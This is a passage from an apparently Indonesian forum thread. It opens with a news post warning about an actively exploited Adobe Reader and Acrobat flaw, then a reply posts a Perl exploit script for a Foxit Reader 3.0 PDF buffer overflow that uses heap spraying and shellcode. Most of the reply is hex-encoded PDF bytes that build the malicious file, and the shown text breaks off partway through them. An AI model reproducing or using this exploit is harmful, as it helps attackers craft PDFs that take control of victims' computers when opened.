http://idgs.in/184745
  1. #1
    -GajahLampung-'s Avatar
    Join Date
    Nov 2008
    Location
    Penangkaran Gajah
    Posts
    1,069
    Points
    1,449.20
    Thanks: 0 / 4 / 4

    Be Careful Opening PDF Files!



    Security companies are warning that two Adobe programs can be exploited by hackers to take over a PC. Hackers are actively attacking the flaw, particularly in Adobe Reader and Acrobat versions 8 and 9, which are used to open PDF files.

    According to Adobe, the problem can cause the application to crash and could potentially allow an attacker to take over the victim's system. Adobe categorizes the issue as critical and recommends that users update their antivirus and scan files from untrusted sources before opening them.

    "Adobe plans to release an update for Adobe Reader and Acrobat to address this problem. Adobe will make it available on 11 March 2009 for version 9," the company said. The updates for versions 7 and 8 will come later.

    For now, Adobe has contacted antivirus vendors including McAfee and Symantec. According to the Shadowserver Foundation, there are several variants of the attack and it is only a matter of time before the flaw is picked up by exploit packs on the internet.
    "The problem in Adobe Reader lets an attacker overwrite memory at an arbitrary location," said Geok Meng Ong of McAfee. "The attack uses the 'HeapSpray' method via JavaScript to gain control of program execution," he explained. (inilah)

  3. #2

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8


    Yep, correct.. here I'll give an example Perl script that builds the buffer overflow:

    Code:
    #!/usr/bin/perl
    #
    # Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Universal)
    # ------------------------------------------------------------------------
    # Exploit by SkD                                      ([email protected])
    #
    # A SEH overflow occurs in this vulnerability in the popular
    # Foxit Reader. The latest build (1506) is not affected but
    # previous are. SafeSEH is a ***** in this one, but nothing
    # is impossible :).
    #
    # UPDATE: I have implemented Heap Spraying by JavaScript to
    # make it universal :). The current shellcode is to execute
    # calc.exe.
    #
    # Exploit written for Windows XP SP3 (should work on other
    # versions).
    #
    # Credits to CORE Sec.
    #
    # Note: Author is not responsible for any damage done with this.
    
    use strict;
    use warnings;
    
    my $pdf_data1 = "\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x0A\x25\xA1\xB3\xC5\xD7\x0D\x0A\x31\x20\x30\x20\x6F".
    	        "\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x50\x61\x67\x65\x2F\x50\x61\x72\x65\x6E".
    	        "\x74\x20\x34\x20\x30\x20\x52\x20\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36\x20\x30".
    	        "\x20\x52\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20".
    	        "\x38\x34\x32\x5D\x2F\x47\x72\x6F\x75\x70\x3C\x3C\x2F\x53\x2F\x54\x72\x61\x6E\x73\x70\x61".
    	        "\x72\x65\x6E\x63\x79\x2F\x43\x53\x2F\x44\x65\x76\x69\x63\x65\x52\x47\x42\x2F\x49\x20\x74".
    	        "\x72\x75\x65\x3E\x3E\x2F\x43\x6F\x6E\x74\x65\x6E\x74\x73\x20\x32\x20\x30\x20\x52\x20\x2F".
    	        "\x41\x6E\x6E\x6F\x74\x73\x5B\x20\x32\x34\x20\x30\x20\x52\x20\x20\x32\x35\x20\x30\x20\x52".
    	        "\x20\x20\x39\x20\x30\x20\x52\x20\x5D\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32".
    	        "\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x33\x20\x30\x20".
    	        "\x52\x20\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E".
    	        "\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x33\xD0\x33\x54\x28\xE7\x2A\x54\x30\x50\x30".
    	        "\x00\xB2\x4C\x2D\x4D\xF5\x8C\x15\x2C\x4C\x0C\xF5\x2C\x15\x8A\x52\x15\xC2\xB5\x14\xF2\xB8".
    	        "\x02\x15\x00\x87\xEB\x07\x8A\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E".
    	        "\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x20\x34\x32\x0D\x0A\x65\x6E".
    	        "\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65".
    	        "\x2F\x50\x61\x67\x65\x73\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36\x20\x30\x20\x52".
    	        "\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20\x38\x34".
    	        "\x32\x5D\x2F\x4B\x69\x64\x73\x5B\x20\x31\x20\x30\x20\x52\x20\x5D\x2F\x43\x6F\x75\x6E\x74".
    	        "\x20\x31\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20\x30\x20\x6F\x62\x6A\x0D".
    	        "\x0A\x3C\x3C\x2F\x5A\x69\x54\x69\x20\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E".
    	        "\x64\x6F\x62\x6A\x0D\x0A\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x46\x6F\x6E\x74".
    	        "\x20\x35\x20\x30\x20\x52\x20\x2F\x50\x72\x6F\x63\x53\x65\x74\x5B\x2F\x50\x44\x46\x2F\x54".
    	        "\x65\x78\x74\x5D\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x37\x20\x30\x20\x6F\x62".
    	        "\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61\x6C\x6F\x67\x2F\x50\x61\x67".
    	        "\x65\x73\x20\x34\x20\x30\x20\x52\x20\x2F\x4F\x70\x65\x6E\x41\x63\x74\x69\x6F\x6E\x5B\x20".
    	        "\x31\x20\x30\x20\x52\x20\x2F\x58\x59\x5A\x20\x6E\x75\x6C\x6C\x20\x6E\x75\x6C\x6C\x20\x30".
    	        "\x5D\x2F\x4C\x61\x6E\x67\x28\x65\x6E\x2D\x55\x53\x29\x2F\x4E\x61\x6D\x65\x73\x20\x32\x38".
    	        "\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x38\x20\x30\x20\x6F".
    	        "\x62\x6A\x0D\x0A\x3C\x3C\x2F\x41\x75\x74\x68\x6F\x72\x28\xFE\xFF\x00\x6D\x00\x61\x00\x72".
    	        "\x00\x63\x00\x69\x00\x61\x00\x6E\x00\x6F\x29\x2F\x43\x72\x65\x61\x74\x6F\x72\x28\xFE\xFF".
    	        "\x00\x57\x00\x72\x00\x69\x00\x74\x00\x65\x00\x72\x29\x2F\x50\x72\x6F\x64\x75\x63\x65\x72".
    	        "\x28\xFE\xFF\x00\x4F\x00\x70\x00\x65\x00\x6E\x00\x4F\x00\x66\x00\x66\x00\x69\x00\x63\x00".
    	        "\x65\x00\x2E\x00\x6F\x00\x72\x00\x67\x00\x20\x00\x33\x00\x2E\x00\x30\x29\x2F\x43\x72\x65".
    	        "\x61\x74\x69\x6F\x6E\x44\x61\x74\x65\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34".
    	        "\x34\x35\x34\x39\x2D\x30\x32\x27\x30\x30\x27\x29\x2F\x4D\x6F\x64\x44\x61\x74\x65\x28\x44".
    	        "\x3A\x32\x30\x30\x39\x30\x33\x31\x32\x32\x32\x30\x32\x34\x33\x2D\x30\x38\x27\x30\x30\x27".
    	        "\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A".
    	        "\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74\x79\x70\x65\x2F".
    	        "\x53\x63\x72\x65\x65\x6E\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44\x3A\x32\x30".
    	        "\x30\x39\x30\x32\x31\x39\x31\x34\x34\x37\x35\x36\x2D\x30\x32\x27\x30\x30\x27\x29\x2F\x46".
    	        "\x20\x34\x2F\x52\x65\x63\x74\x5B\x20\x32\x30\x35\x2E\x31\x35\x33\x20\x38\x30\x36\x2E\x31".
    	        "\x38\x32\x20\x33\x33\x35\x2E\x32\x39\x31\x20\x38\x33\x33\x2E\x34\x37\x32\x5D\x2F\x42\x53".
    	        "\x3C\x3C\x2F\x53\x2F\x53\x2F\x57\x20\x31\x3E\x3E\x2F\x42\x45\x3C\x3C\x2F\x53\x2F\x53\x3E".
    	        "\x3E\x2F\x4D\x4B\x3C\x3C\x2F\x42\x43\x5B\x20\x30\x20\x30\x20\x31\x5D\x2F\x52\x20\x30\x2F".
    	        "\x49\x46\x3C\x3C\x2F\x53\x57\x2F\x41\x2F\x53\x2F\x41\x2F\x46\x42\x20\x66\x61\x6C\x73\x65".
    	        "\x2F\x41\x5B\x20\x30\x2E\x35\x20\x30\x2E\x35\x5D\x3E\x3E\x3E\x3E\x2F\x41\x50\x3C\x3C\x2F".
    	        "\x4E\x20\x31\x30\x20\x30\x20\x52\x20\x3E\x3E\x2F\x54\x28\x63\x75\x61\x6C\x71\x75\x69\x65".
    	        "\x72\x61\x29\x2F\x41\x20\x31\x32\x20\x30\x20\x52\x20\x2F\x41\x41\x20\x31\x37\x20\x30\x20".
    	        "\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x30\x20\x30\x20\x6F\x62\x6A".
    	        "\x0D\x0A\x3C\x3C\x2F\x4D\x61\x74\x72\x69\x78\x5B\x20\x31\x20\x30\x20\x30\x20\x31\x20\x30".
    	        "\x20\x30\x5D\x2F\x42\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x31\x33\x30\x2E\x31\x33\x39\x20".
    	        "\x32\x37\x2E\x32\x38\x39\x37\x5D\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x3C\x3C\x2F\x45".
    	        "\x78\x74\x47\x53\x74\x61\x74\x65\x3C\x3C\x2F\x49\x6D\x61\x67\x65\x4F\x70\x61\x63\x69\x74".
    	        "\x79\x20\x31\x31\x20\x30\x20\x52\x20\x3E\x3E\x3E\x3E\x2F\x4C\x65\x6E\x67\x74\x68\x20\x35".
    	        "\x34\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E".
    	        "\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x2B\xE4\x2A\xE4\x32\x50\x00\xC1\xA2\x74\x30\xC3".
    	        "\xD0\xD8\x40\xCF\xD0\xD8\x52\xC1\xC8\x5C\xCF\xC8\xC2\xD2\x5C\xA1\x28\x95\xCB\x50\x01\x08".
    	        "\x8D\x2C\x20\xC2\xA6\x70\xE1\x34\x2D\xAE\x40\x20\x04\x00\xBD\x52\x0D\x43\x0D\x0A\x65\x6E".
    	        "\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x31\x20\x30\x20".
    	        "\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x45\x78\x74\x47\x53\x74\x61\x74\x65".
    	        "\x2F\x43\x41\x20\x31\x2F\x63\x61\x20\x31\x2F\x41\x49\x53\x20\x66\x61\x6C\x73\x65\x3E\x3E".
    	        "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C".
    	        "\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E\x2F\x53\x2F\x52\x65\x6E\x64\x69\x74\x69".
    	        "\x6F\x6E\x2F\x4F\x50\x20\x34\x2F\x41\x4E\x20\x39\x20\x30\x20\x52\x20\x2F\x52\x20\x31\x33".
    	        "\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x33\x20\x30\x20".
    	        "\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x52\x2F\x43\x20\x31\x34\x20\x30\x20\x52\x20".
    	        "\x2F\x4E\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72\x61\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F".
    	        "\x62\x6A\x0D\x0A\x31\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x43\x44".
    	        "\x2F\x43\x54\x28\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x66\x75\x74\x75\x72\x65".
    	        "\x73\x70\x6C\x61\x73\x68\x29\x2F\x50\x3C\x3C\x2F\x54\x46\x28\x54\x45\x4D\x50\x41\x43\x43".
    	        "\x45\x53\x53\x29\x3E\x3E\x2F\x44\x20\x31\x35\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E".
    	        "\x64\x6F\x62\x6A\x0D\x0A\x31\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70".
    	        "\x65\x2F\x46\x69\x6C\x65\x73\x70\x65\x63\x2F\x46\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72".
    	        "\x61\x29\x2F\x46\x53\x2F\x55\x52\x4C\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31".
    	        "\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F".
    	        "\x6E\x2F\x53\x2F\x4C\x61\x75\x6E\x63\x68\x2F\x46\x3C\x3C\x2F\x46\x28\x2F\x43\x2F";
    my $pdf_data2 = "\x29\x3E\x3E\x2F\x4E\x65\x77\x57\x69\x6E\x64\x6F\x77\x20\x74\x72\x75\x65\x3E\x3E\x0D\x0A".
    	        "\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x50".
    	        "\x56\x20\x31\x36\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31".
    	        "\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x46\x6F\x6E\x74\x2F".
    	        "\x53\x75\x62\x74\x79\x70\x65\x2F\x54\x79\x70\x65\x31\x2F\x42\x61\x73\x65\x46\x6F\x6E\x74".
    	        "\x2F\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x2F\x45\x6E\x63\x6F\x64\x69\x6E\x67\x2F\x57\x69".
    	        "\x6E\x41\x6E\x73\x69\x45\x6E\x63\x6F\x64\x69\x6E\x67\x2F\x46\x78\x54\x61\x67\x20\x31\x3E".
    	        "\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C".
    	        "\x3C\x2F\x4E\x20\x32\x30\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D".
    	        "\x0A\x32\x30\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x31".
    	        "\x36\x38\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x6F\x72\x6D\x2F\x42\x42\x6F\x78\x5B\x20".
    	        "\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x52\x65\x73\x6F\x75".
    	        "\x72\x63\x65\x73\x20\x32\x31\x20\x30\x20\x52\x20\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C".
    	        "\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x95".
    	        "\x8D\xCD\x0E\x82\x30\x10\x84\xEF\x7D\x8A\x3D\x42\xA2\xD8\x16\x88\x78\x15\xE1\x66\x4C\xB4".
    	        "\x2F\x50\x43\xC1\x1A\xE8\x92\xA6\xFE\xF4\xED\x25\x24\x28\x89\x27\xF6\x30\x99\x99\x6C\xBE".
    	        "\xD9\x0B\xB2\x39\xFA\x12\x8D\x03\xC6\x40\xD4\x84\x45\x74\x3C\xA0\x7F\xC6\x36\x84\xC1\x90".
    	        "\x81\x01\xCF\xD2\xA9\xDD\xEE\x92\xC9\x8A\x8E\x7C\x9F\x79\x12\xC5\x9C\x51\x3A\x40\x0F\x24".
    	        "\x28\x2A\xED\x54\x05\x57\x0F\x25\xBE\xB5\x83\xB3\x92\x95\xB2\x21\x88\xFB\x02\x24\x8B\xE7".
    	        "\xC8\x1C\x7B\x6F\x75\x73\x73\x41\x1E\xFE\xC0\x17\xAC\xDD\x4B\x5A\x05\x39\x76\xBD\x34\x7E".
    	        "\xC5\x29\x4D\xD7\x83\x64\x0B\xC7\xF8\x7C\xAB\x44\x0B\xC5\x53\xB6\x0F\xE9\x34\x1A\x38\x99".
    	        "\xD6\x47\x23\xAF\x10\xE4\x03\x4A\x14\x4C\x32\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D".
    	        "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C".
    	        "\x2F\x46\x6F\x6E\x74\x20\x32\x32\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62".
    	        "\x6A\x0D\x0A\x32\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x79\x46\x6F\x6E\x74".
    	        "\x20\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x33".
    	        "\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x65\x78\x74\x4D\x61\x74\x72\x69\x78\x5B".
    	        "\x20\x31\x20\x30\x20\x30\x20\x31\x20\x32\x38\x35\x20\x38\x31\x30\x2E\x35\x5D\x2F\x4C\x69".
    	        "\x63\x65\x6E\x73\x65\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x29\x2F\x4D\x65\x6E\x64".
    	        "\x65\x72\x46\x6C\x61\x67\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x2C\x41\x4E\x4E\x4F".
    	        "\x54\x29\x2F\x46\x6F\x6E\x74\x4E\x61\x6D\x65\x28\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x29".
    	        "\x2F\x46\x6F\x6E\x74\x53\x69\x7A\x65\x20\x31\x31\x2F\x54\x65\x78\x74\x28\x45\x64\x69\x74".
    	        "\x65\x64\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C\x72\x43\x6F".
    	        "\x70\x79\x72\x69\x67\x68\x74\x5C\x28\x43\x5C\x29\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20".
    	        "\x53\x6F\x66\x74\x77\x61\x72\x65\x20\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D".
    	        "\x32\x30\x30\x38\x5C\x72\x46\x6F\x72\x20\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x20\x4F".
    	        "\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x43\x68\x61\x72\x43\x6F\x6C\x6F\x72\x20\x32\x35\x35\x2F".
    	        "\x43\x68\x61\x72\x53\x70\x61\x63\x65\x20\x30\x2F\x4C\x69\x6E\x65\x46\x65\x65\x64\x20\x30".
    	        "\x2F\x48\x6F\x72\x7A\x53\x63\x61\x6C\x65\x20\x31\x30\x30\x2F\x4F\x72\x69\x67\x69\x6E\x58".
    	        "\x20\x32\x38\x35\x2F\x4F\x72\x69\x67\x69\x6E\x59\x20\x38\x31\x36\x2F\x62\x43\x68\x61\x6E".
    	        "\x67\x65\x42\x6F\x78\x20\x30\x2F\x42\x6F\x78\x57\x69\x64\x74\x68\x20\x32\x35\x36\x3E\x3E".
    	        "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C".
    	        "\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x72\x65\x65\x54\x65\x78\x74\x2F\x52\x65\x63\x74".
    	        "\x5B\x20\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x46\x20\x34".
    	        "\x2F\x41\x50\x20\x31\x39\x20\x30\x20\x52\x20\x2F\x46\x6F\x78\x69\x74\x54\x61\x67\x20\x32".
    	        "\x33\x20\x30\x20\x52\x20\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x50\x6F\x70\x75\x70\x20".
    	        "\x32\x35\x20\x30\x20\x52\x20\x2F\x46\x4E\x28\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x29\x2F".
    	        "\x43\x6F\x6E\x74\x65\x6E\x74\x73\x28\x45\x64\x69\x74\x65\x64\x20\x62\x79\x20\x46\x6F\x78".
    	        "\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C\x72\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x5C\x28".
    	        "\x43\x5C\x29\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x53\x6F\x66\x74\x77\x61\x72\x65\x20".
    	        "\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D\x32\x30\x30\x38\x5C\x72\x46\x6F\x72".
    	        "\x20\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x20\x4F\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x42".
    	        "\x4B\x43\x20\x36\x35\x35\x33\x35\x2F\x51\x20\x30\x2F\x44\x41\x28\x2F\x5A\x69\x54\x69\x20".
    	        "\x31\x31\x20\x54\x66\x20\x31\x20\x30\x20\x30\x20\x72\x67\x20\x31\x20\x30\x20\x30\x20\x31".
    	        "\x20\x32\x38\x35\x20\x38\x31\x30\x2E\x35\x20\x54\x6D\x20\x30\x20\x54\x63\x20\x31\x30\x30".
    	        "\x20\x54\x7A\x29\x2F\x49\x54\x2F\x46\x72\x65\x65\x54\x65\x78\x74\x54\x79\x70\x65\x77\x72".
    	        "\x69\x74\x65\x72\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x35\x20\x30\x20\x6F".
    	        "\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74".
    	        "\x79\x70\x65\x2F\x50\x6F\x70\x75\x70\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44".
    	        "\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x38\x31\x35\x2D\x30\x32\x27\x30\x30\x27".
    	        "\x29\x2F\x46\x20\x32\x38\x2F\x52\x65\x63\x74\x5B\x20\x30\x20\x30\x20\x30\x20\x30\x5D\x2F".
    	        "\x4F\x70\x65\x6E\x20\x66\x61\x6C\x73\x65\x2F\x50\x61\x72\x65\x6E\x74\x20\x32\x34\x20\x30".
    	        "\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x30\x20\x30\x20\x6F\x62".
    	        "\x6A\x0D\x0A\x5B\x28\x53\x6B\x44\x53\x63\x72\x69\x70\x74\x29\x20\x32\x36\x20\x30\x20\x52".
    	        "\x5D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C".
    	        "\x3C\x2F\x4E\x61\x6D\x65\x73\x20\x33\x30\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64".
    	        "\x6F\x62\x6A\x0D\x0A\x32\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4A\x61\x76\x61".
    	        "\x53\x63\x72\x69\x70\x74\x20\x32\x39\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F".
    	        "\x62\x6A\x0D\x0A\x32\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74".
    	        "\x68\x20\x37\x39\x36\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F".
    	        "\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x7D\x54\x5D\x8F\xDA\x30\x10\x7C".
    	        "\x47\xE2\x3F\x44\x48\x48\x20\x7A\x95\x13\xAF\x77\x13\x71\x54\xAA\xFA\x33\xAA\x3E\x24\xC1".
    	        "\xB9\x8B\xCA\x01\x82\xE3\xAE\xED\xAF\xEF\xEE\xA4\x31\x5C\xBF\x78\xB0\x8C\xBD\xB3\x3B\x3B".
    	        "\x3B\xCE\x4B\x7D\xCA\x8E\xF5\xF7\xDD\xA1\xDE\x66\x9B\xEC\xB2\x8F\xE7\xB6\x3E\xC6\xC5\x6C".
    	        "\x7E\x71\x3E\x36\xF3\x4B\x6C\x42\xA5\x6B\xE9\xC2\xFC\xD2\x75\x5D\x89\xB5\x9B\x5F\xA8\xA2".
    	        "\xEA\x76\x9D\x65\xAB\xE9\x64\x86\x7D\xF9\xE7\xED\xDB\x35\xD4\x21\xD7\xBD\xE7\x7A\x44\x79".
    	        "\x17\x14\xE5\x73\x2A\xF4\xBC\x08\x6E\x7E\xE1\x86\x2C\x66\x3C\xF1\xB6\x7A\xDD\xFB\x82\xF2".
    	        "\x54\x2B\x1F\x62\xBC\xC6\x87\xD2\xF6\xBE\x34\x2C\x15\x40\x95\x12\x2C\x0F\x5B\xDD\x2D\xB5".
    	        "\x23\x8A\xBD\xD7\x5A\x12\x84\x34\xDE\xA3\x96\x58\x06\x6A\x45\x57\xF1\xA4\x5D\x07\x01\x36".
    	        "\xDE\xA2\x58\xCF\x29\x50\x6B\xFB\x10\x0C\x6B\x9D\x86\xD2\x6B\x5D\x6E\x59\x35\x11\x67\x58".
    	        "\x11\xEA\x12\x2A\xB2\xD5\x02\x56\x72\x8B\xE1\x60\xB5\x18\x0A\x48\x61\xF1\x14\x8D\xA1\x67".
    	        "\x6E\x52\x5F\x31\x90\xD5\x42\xC5\x41\x2B\xA6\x68\xBD\x60\xDF\x09\xD8\x1A\x4A\xF3\x27\x86".
    	        "\xA1\x62\xB2\x5A\xD6\x51\xF0\x44\xE0\x26\x7A\x52\x9B\x32\x81\xB8\x06\xE7\xAD\x9E\x28\xE7".
    	        "\x54\xAB\x34\xAD\xA4\x06\x43\xB1\xBA\x01\xAC\x98\xA1\x0F\x59\x1E\x2E\x90\xAD\x0A\xE1\xDA".
    	        "\x97\xE9\x43\xB9\xA1\x3C\x53\x07\x65\x68\xEC\x2B\x40\x43\x6A\x03\x83\x79\xEA\x4B\x0A\x6E".
    	        "\xC1\xBC\x19\x63\xBC\x40\x13\x6F\xE7\x5C\x9B\x92\x14\xA1\x61\xB8\xAA\xC1\xAD\x69\xAE\xE9".
    	        "\x1B\xB0\xB5\x98\x2D\x32\xE4\xE6\xCC\x90\xDB\xAD\x27\x6F\x8A\xD5\x44\x57\x47\xB1\x7A\x86".
    	        "\x3B\x4C\xA7\xC0\x7C\xA3\x31\x14\x70\x0E\x04\x9F\x34\x02\xA7\xF9\xD4\x57\x70\xD0\x96\xA5".
    	        "\xC4\x4C\x31\x6B\xD4\xA5\x41\x73\xAB\x45\x60\xE2\x75\x8E\x57\x35\xE0\x8A\xD6\xB4\xE5\x1C".
    	        "\xFE\x09\xC8\x50\x9B\xAB\x79\x60\x1E\xCD\xF9\xEA\xC6\x9B\xBE\xE0\x5B\x91\xB4\xD2\xB0\x0E".
    	        "\x3E\x84\x97\x48\xE0\x9F\xFC\xEA\x43\xAD\x6E\x8A\x35\x92\x63\x9A\x6C\x93\x42\x2F\x9D\x67".
    	        "\x60\xE1\x0A\x73\x38\x75\xEC\x93\xF2\x78\x23\xAA\x89\xE5\xCC\xE1\x90\x72\xE8\x51\x06\xB7".
    	        "\xD4\xA6\xA4\xC7\x8B\xB8\xBA\x57\x7D\x68\xAF\xB2\x42\xE4\x96\xA3\x29\x13\x6A\xEB\x11\xFB".
    	        "\x86\xD4\x5D\x5C\x81\x8F\x17\x49\xA8\x60\xAF\xD5\x7B\xF3\xDB\x30\x71\x7D\xDD\x62\xDA\xC2".
    	        "\xB1\x85\x61\xB5\x3B\x78\x95\xBB\x9B\xB7\x2C\x70\x94\xB7\x48\xE8\x5C\x88\xE5\x19\xA6\x3C".
    	        "\x4C\x13\x6F\x56\xDC\xCD\xBC\x88\xB7\x38\x1F\x2A\x16\xE8\xB1\x1D\xF3\x88\x13\xB8\x11\x73".
    	        "\xD4\x87\x97\xBC\x91\xDB\x6B\x12\x32\x0F\x6B\x36\x53\x58\xD8\xFC\xEC\xC5\xCD\x96\xEB\x6C".
